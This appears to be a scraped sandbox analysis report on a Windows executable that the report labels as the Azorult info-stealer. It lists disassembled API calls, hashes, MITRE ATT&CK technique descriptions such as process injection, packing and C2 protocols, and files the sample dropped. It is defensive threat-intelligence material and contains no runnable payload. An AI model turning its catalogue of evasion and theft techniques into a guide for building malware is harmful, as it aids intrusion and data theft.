Source File: 00000000.00000002.1908458496.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_8p5iD52knN.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: afc8384d7de5dc81d749eb2ef2e502e72940c946d5071aaa17129bf9d5fb4602
Instruction ID: 9440fa168d12a83eba1a092897212109d6b0fc6f12ae44bfa852d76b5e73477e
Opcode Fuzzy Hash: afc8384d7de5dc81d749eb2ef2e502e72940c946d5071aaa17129bf9d5fb4602
Instruction Fuzzy Hash: 0B114E7300014ABBCF125E85DC518EE7F22BB1C354F59981AFE2859135C67ACAB2AB85

Function 00401870 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
Opcode Fuzzy Hash: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E

Function 0040246C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,^), ref: 004024AF
RtlLeaveCriticalSection.KERNEL32(0041C5B4,00402524), ref: 00402517

Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920

Strings

^, xrefs: 00402496

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID: ^
API String ID: 2227675388-551292248
Opcode ID: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
Opcode Fuzzy Hash: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
Instruction Fuzzy Hash: 92113431700210AEEB25AB7A5F49B5A7BD59786358F20407FF404F32D2D6BD9C00825C

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 8p5iD52knN.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Azorult

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_8p5iD52knN.exe_423721fef99bf032cbd4c8368b16262299f_d9dac82a_7f569724-35bd-4147-9070-cf3d399e1f88\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D2B.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER600A.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER603A.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
8p5iD52knN.exe

Function 004381A5 Relevance: 79.1, APIs: 41, Strings: 4, Instructions: 381
windowmemorylibraryCOMMON

Function 00417B1A Relevance: 57.8, APIs: 20, Strings: 13, Instructions: 64
libraryloaderCOMMON

Function 00438763 Relevance: 4.5, APIs: 3, Instructions: 48
processlibraryCOMMON

Function 00419108 Relevance: 57.0, APIs: 4, Strings: 28, Instructions: 964
synchronizationCOMMON

Function 00418688 Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 375
libraryloadernetworkCOMMON

Function 0061FDB4 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347
memoryCOMMON

Function 0040955E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10
libraryloaderCOMMON

Function 00407C58 Relevance: 4.6, APIs: 3, Instructions: 80
COMMON

Function 006203E4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168
libraryCOMMON

Function 004040F4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
memoryCOMMON

Function 00407500 Relevance: 3.1, APIs: 2, Instructions: 76
registryCOMMON

Function 004033F4 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Function 004033EC Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Function 004033F0 Relevance: 3.1, APIs: 2, Instructions: 64
COMMON

Function 00406DA8 Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON